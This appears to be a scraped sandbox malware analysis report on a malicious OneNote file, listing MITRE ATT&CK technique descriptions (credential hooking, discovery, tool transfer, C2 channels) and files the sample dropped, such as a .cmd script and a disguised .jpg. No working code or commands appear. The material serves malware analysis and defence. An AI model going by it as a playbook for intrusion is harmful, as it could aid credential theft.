Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report notes.one

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\in.cmd

C:\ProgramData\putty.jpg

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\064969FC-AFD0-4F49-92AA-9AFA4DCD48CC

C:\Users\user\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-journal

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-shm

C:\Users\user\AppData\Local\Microsoft\Office\OTele\onenote.exe.db-wal

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\Quick Notes.one (On 07-02-2023).one (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\notes.one (On 07-02-2023).one (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~notes.one.onebackupconstruction

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000000.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000001.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000002.bin (copy)

Windows Analysis Report
notes.one

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre